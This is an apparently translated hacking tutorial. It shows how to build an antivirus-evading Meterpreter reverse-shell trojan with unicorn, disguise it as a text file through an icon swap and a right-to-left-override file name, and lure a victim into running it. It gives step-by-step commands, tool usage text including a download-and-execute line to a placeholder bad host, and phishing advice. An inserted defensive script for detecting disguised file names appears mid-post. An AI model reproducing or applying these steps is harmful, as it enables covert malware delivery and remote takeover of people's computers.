Hands-on: generating an AV-evading trojan with unicorn and bypassing the Windows 10 firewall and Windows Defender
- Introduction
- Principle
- Steps
- Attack
- Summary
Introduction
As operating systems raise their security level, demand grows for trojans that evade antivirus and ignore the firewall. The mainstream tools today are WinPayloads, Veil v3 and TheFatRat; this post introduces an open-source tool, unicorn. Original article:
https://null-byte.wonderhowto.com/how-to/hacking-windows-10-create-undetectable-payload-part-1-bypassing-antivirus-software-0185055/
Principle
Generate an MSF payload with the open-source tool, disguise it as a TXT file and run it on the target machine.
Steps
Remove the stock MSF:
sudo apt-get remove metasploit-framework
Install the latest MSF:
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
./msfinstall
Install unicorn:
git clone https://github.com/trustedsec/unicorn
cd unicorn/
./unicorn.py --help
-------------------- Magic Unicorn Attack Vector v3.1 -----------------------------
Native x86 powershell injection attacks on any Windows platform.
Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @TrustedSec, @HackingDave
Credits: Matthew Graeber, Justin Elze, Chris Gates
Happy Magic Unicorns.
Usage: python unicorn.py payload reverse_ipaddr port <optional hta or macro, crt>
PS Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443
PS Down/Exec: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe
Macro Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macro
Macro Example CS: python unicorn.py <cobalt_strike_file.cs> cs macro
Macro Example Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode macro
HTA Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta
HTA Example CS: python unicorn.py <cobalt_strike_file.cs> cs hta
HTA Example Shellcode: python unicorn.py <path_to_shellcode.txt>: shellcode hta
DDE Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 dde
CRT Example: python unicorn.py <path_to_payload/exe_encode> crt
Custom PS1 Example: python unicorn.py <path to ps1 file>
Custom PS1 Example: python unicorn.py <path to ps1 file> macro 500
Cobalt Strike Example: python unicorn.py <cobalt_strike_file.cs> cs (export CS in C# format)
Custom Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode (formatted 0x00)
Help Menu: python unicorn.py --help
Generate the payload:
./unicorn.py windows/meterpreter/reverse_https <ATTACKER-IP-ADDRESS> <PORT>
Replace ATTACKER-IP-ADDRESS and PORT with the address and port of the attack server; here port 443 is used together with the reverse HTTPS payload.
[*] Generating the payload shellcode.. This could take a few seconds/minutes as we create the shellcode...
Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @TrustedSec, @HackingDave
Happy Magic Unicorns.
[********************************************************************************************************]
-----POWERSHELL ATTACK INSTRUCTIONS----
Everything is now generated in two files, powershell_attack.txt and unicorn.rc. The text file contains all of the code needed in order to inject the powershell attack into memory. Note you will need a place that supports remote command injection of some sort. Often times this could be through an excel/word doc or through psexec_commands inside of Metasploit, SQLi, etc.. There are so many implications and scenarios to where you can use this attack at. Simply paste the powershell_attack.txt command in any command prompt window or where you have the ability to call the powershell executable and it will give a shell back to you. This attack also supports windows/download_exec for a payload method instead of just Meterpreter payloads. When using the download and exec, simply put python unicorn.py windows/download_exec url=https://www.thisisnotarealsite.com/payload.exe and the powershell code will download the payload and execute.
Note that you will need to have a listener enabled in order to capture the attack.
[*******************************************************************************************************]
[*] Exported powershell output code to powershell_attack.txt.
[*] Exported Metasploit RC file as unicorn.rc. Run msfconsole -r unicorn.rc to execute and create listener.
Two files are generated in the unicorn directory, unicorn.rc and powershell_attack.txt; the latter is the one we need to run on the target machine.
Save powershell_attack.txt locally with WinSCP, convert it to .bat format, then download the Windows 10 icon set:
git clone 'https://github.com/B00merang-Project/Windows-10-Icons'
Here choose text-x-generic.png under Windows-10-Icons/256x256/mimetypes/.
Convert the PNG to an ICON at https://convertico.com/, then open the BAT2EXE converter, open powershell_attack.bat and add notepad at the top:
Save it as a Windows 64-bit invisible text.exe, then disguise the file extension.
First rename the file to texttxt.exe, then copy the right-to-left override character (U+202E) from https://unicode-table.com/en/202E/ into the name. The file name now displays as textexe.txt, but it is actually an executable; this trick fools target users even when file-extension display is turned on.
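The defender's counterpart to the extension trick above, as an added example that is not part of the original post: a Python script that detects Unicode bidirectional override characters in file names, reconstructs roughly what Explorer would show, and reports the real extension. The name "text" + U+202E + "txt.exe" is constructed here to match the post's texttxt.exe example; the extension list is an assumption, not something from the post.

```python
import os

# Unicode bidirectional control characters that can reorder how a name is drawn.
BIDI_CONTROLS = {
    "\u202A", "\u202B", "\u202C", "\u202D", "\u202E",  # LRE, RLE, PDF, LRO, RLO
    "\u2066", "\u2067", "\u2068", "\u2069",            # LRI, RLI, FSI, PDI
    "\u200E", "\u200F",                                # LRM, RLM
}
RLO = "\u202E"
# Assumed set of extensions worth alerting on when hidden behind a bidi override.
EXECUTABLE_EXTS = {"exe", "bat", "cmd", "scr", "com", "ps1", "vbs", "js", "hta", "lnk"}


def rendered_name(name: str) -> str:
    """Approximate how Explorer shows a name with one RLO: text after U+202E is drawn reversed."""
    if RLO not in name:
        return name
    head, _, tail = name.partition(RLO)
    return head + tail[::-1]


def true_extension(name: str) -> str:
    """Extension the OS actually uses: everything after the last dot in the raw string."""
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def inspect_filename(name: str) -> dict:
    """Report bidi controls, the displayed form and whether the real type is executable."""
    found = sorted({f"U+{ord(c):04X}" for c in name if c in BIDI_CONTROLS})
    ext = true_extension(name)
    return {
        "raw": name,
        "displayed_as": rendered_name(name),
        "bidi_controls": found,
        "actual_extension": ext,
        "suspicious": bool(found) and ext in EXECUTABLE_EXTS,
    }


def scan_directory(path: str) -> list:
    """Return inspection results for every suspicious entry directly under path."""
    results = (inspect_filename(entry.name) for entry in os.scandir(path))
    return [r for r in results if r["suspicious"]]


if __name__ == "__main__":
    # Constructed sample matching the post: raw "text" + RLO + "txt.exe" displays as textexe.txt.
    sample = "text" + RLO + "txt.exe"
    print(inspect_filename(sample))
    for hit in scan_directory("."):
        print(f"{hit['displayed_as']!r} is really .{hit['actual_extension']} ({', '.join(hit['bidi_controls'])})")
```

Mail gateways and endpoint tooling can apply the same check to attachment names; the raw extension, not the rendered one, decides how Windows launches the file.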
Attack
SSH into the cloud server, then:
sudo msfconsole -r unicorn/unicorn.rc
Run the automated attack script:
Then lure the target machine into running textexe.txt:
The session is established successfully; note that the target's firewall is fully on and Windows Defender is on:
See? It still gets through regardless~~. Choose sessions -i 1 to connect to the target machine:
No commands are available, because after the MSF upgrade stdapi is not loaded by default. Enter:
load stdapi
Then you get the shell:
Isn't it amazing? What to do next I won't go into~~
Summary
This method still requires the target to open your file, so in practice a phishing email can be used to lure the target into opening the txt or image remotely. There is also an obvious defence against it: watch the text right before the file extension, and if it is exe/bat be especially careful. Finally, readers are reminded to obey the law; this article accepts no responsibility for any consequences.